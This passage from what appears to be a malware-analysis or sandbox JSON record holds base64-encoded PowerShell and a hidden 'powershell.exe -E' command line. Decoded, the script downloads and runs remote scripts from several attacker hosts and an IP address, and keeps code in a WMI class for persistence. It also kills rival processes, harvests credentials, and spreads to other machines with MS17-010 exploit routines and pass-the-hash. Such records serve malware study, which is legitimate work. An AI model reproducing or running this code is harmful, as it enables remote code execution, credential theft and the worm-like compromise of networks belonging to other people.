jAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHI